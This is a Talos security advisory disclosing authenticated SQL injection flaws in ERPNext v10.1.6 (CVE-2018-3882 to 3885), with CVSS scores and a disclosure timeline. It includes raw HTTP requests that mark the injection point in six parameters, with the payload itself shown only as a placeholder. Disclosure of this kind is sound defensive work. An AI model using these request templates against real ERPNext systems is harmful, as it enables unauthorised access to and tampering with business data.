Talos IntelligenceTALOS-2018-0560ERPNext SQL Injection Vulnerabilities
6.5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
0.001 Low
EPSS
Percentile
36.5%
Summary
Exploitable SQL injection vulnerabilities exists in the authenticated part of ERPNext v10.1.6. Specially crafted web requests can cause SQL injections resulting in data compromise. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.
Tested Versions
ERPNext v10.1.6 (master)
Product URLs
CVSSv3 Score
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
CWE
CWE-89: Improper Neutralization of Special Elements used in an SQL Command (βSQL Injectionβ)
Details
The following parameters are vulnerable to SQL injection attacks:
CVE-2018-3882 - searchfield parameter
The searchfield parameter can be used to perform an SQL injection attack as shown below:
GET /?txt=a&searchfield=name<SQLINJECTION>&query=erpnext.controllers.queries.employee_query&doctype=Employee&cmd=frappe.desk.search.search_widget&_=1522110063950 HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Cookie: user_image=; user_id=Administrator; system_user=yes; full_name=Administrator; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=-cQWmng9Wch23ijkAAAF
DNT: 1
Connection: close
CVE-2018-3883 - employee parameter
The employee parameter can be used to perform an SQL injection attack as shown below:
POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 194
Cookie: user_image=; user_id=Administrator; system_user=yes; full_name=Administrator; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=-cQWmng9Wch23ijkAAAF
DNT: 1
Connection: close
employee=EMP%2f0001<SQLINJECTION>&date=2018-03-07&leave_type=Leave+Without+Pay&consider_all_leaves_in_the_allocation_period=true&cmd=erpnext.hr.doctype.leave_application.leave_application.get_leave_balance_on
CVE-2018-3883 - sort_order parameter
The sort_order parameter can be used to perform an SQL injection attack as shown below:
POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 113
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close
item_code=asdasd&start=0&sort_by=projected_qty&sort_order=asc<SQLINJECTION>&cmd=erpnext.stock.dashboard.item_dashboard.get_data
CVE-2018-3884 - sort_by parameter
The sort_by parameter can be used to perform an SQL injection attack as shown below:
POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 113
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close
item_code=asdasd&start=0&sort_by=projected_qty<SQLINJECTION>&sort_order=asc&cmd=erpnext.stock.dashboard.item_dashboard.get_data
CVE-2018-3884 - start parameter
The start parameter can be used to perform an SQL injection attack as shown below:
POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 113
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close
item_code=asdasd&start=0<SQLINJECTION>&sort_by=projected_qty&sort_order=asc&cmd=erpnext.stock.dashboard.item_dashboard.get_data
CVE-2018-3885 - order_by parameter
The order_by parameter can be used to perform an SQL injection attack as shown below:
GET /?start=0&page_length=20&doctype=Customer&fields=[%22%60tabCustomer%60.%60name%60%22%2c%22%60tabCustomer%60.%60owner%60%22%2c%22%60tabCustomer%60.%60docstatus%60%22%2c%22%60tabCustomer%60.%60_user_tags%60%22%2c%22%60tabCustomer%60.%60_comments%60%22%2c%22%60tabCustomer%60.%60modified%60%22%2c%22%60tabCustomer%60.%60modified_by%60%22%2c%22%60tabCustomer%60.%60_assign%60%22%2c%22%60tabCustomer%60.%60_liked_by%60%22%2c%22%60tabCustomer%60.%60_seen%60%22%2c%22%60tabCustomer%60.%60customer_name%60%22%2c%22%60tabCustomer%60.%60image%60%22%2c%22%60tabCustomer%60.%60disabled%60%22%2c%22%60tabCustomer%60.%60customer_group%60%22%2c%22%60tabCustomer%60.%60territory%60%22%2c%22%60tabCustomer%60.%60customer_type%60%22]&filters=%5B%5D&order_by=<SQLINJECTION>&with_comment_count=true&user_settings=%7B%22updated_on%22%3A%22Tue+Mar+27+2018+01%3A08%3A06+GMT%2B0100%22%2C%22List%22%3A%7B%22filters%22%3A%5B%5D%2C%22order_by%22%3A%22%60tabCustomer%60.%60modified%60+desc%22%7D%2C%22last_view%22%3A%22List%22%7D&cmd=frappe.desk.reportview.get&_=1522108874124 HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close
Timeline
2018-04-12 - Vendor Disclosure
2018-09-05 - Public Release
Related
6.5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
0.001 Low
EPSS
Percentile
36.5%